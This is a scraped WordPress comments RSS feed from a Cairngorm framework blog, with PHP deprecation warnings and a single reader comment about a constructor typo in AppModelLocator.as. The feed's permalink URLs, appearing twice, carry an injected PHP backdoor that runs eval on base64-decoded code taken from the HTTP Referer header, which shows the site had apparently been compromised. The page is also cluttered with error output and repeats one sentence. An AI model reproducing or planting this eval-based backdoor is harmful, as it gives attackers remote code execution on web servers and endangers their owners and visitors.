Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-settings.php on line 267
Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-settings.php on line 269
Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-settings.php on line 270
Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-settings.php on line 287
Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-includes/cache.php on line 36
Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-includes/query.php on line 21
Deprecated: Assigning the return value of new by reference is deprecated in /home/cairndoc/public_html/blog/wp-includes/theme.php on line 540
Warning: Cannot modify header information - headers already sent by (output started at /home/cairndoc/public_html/blog/wp-settings.php:267) in /home/cairndoc/public_html/blog/wp-includes/feed-rss2-comments.php on line 2 Comments for cairngormdocs.org
http://cairngormdocs.org/blog
Cairngormdocs.org BlogSun, 05 Feb 2012 17:07:52 +0000http://wordpress.org/?v=2.3.2Comment on Darren Houle’s “Cafe Townsend Multi-View Contact Management” Example by Uno Dos
http://cairngormdocs.org/blog/2006/11/23/cafe-townsend-multi-view-contact-management-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-47941
Uno DosMon, 25 Apr 2011 18:12:13 +0000http://cairngormdocs.org/blog/2006/11/23/cafe-townsend-multi-view-contact-management-example/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comment-47941The constructor in AppModelLocator.as appears to have a few typos.
public function AppLocator() : void {
should be:
public function AppModelLocator() {The constructor in AppModelLocator.as appears to have a few typos.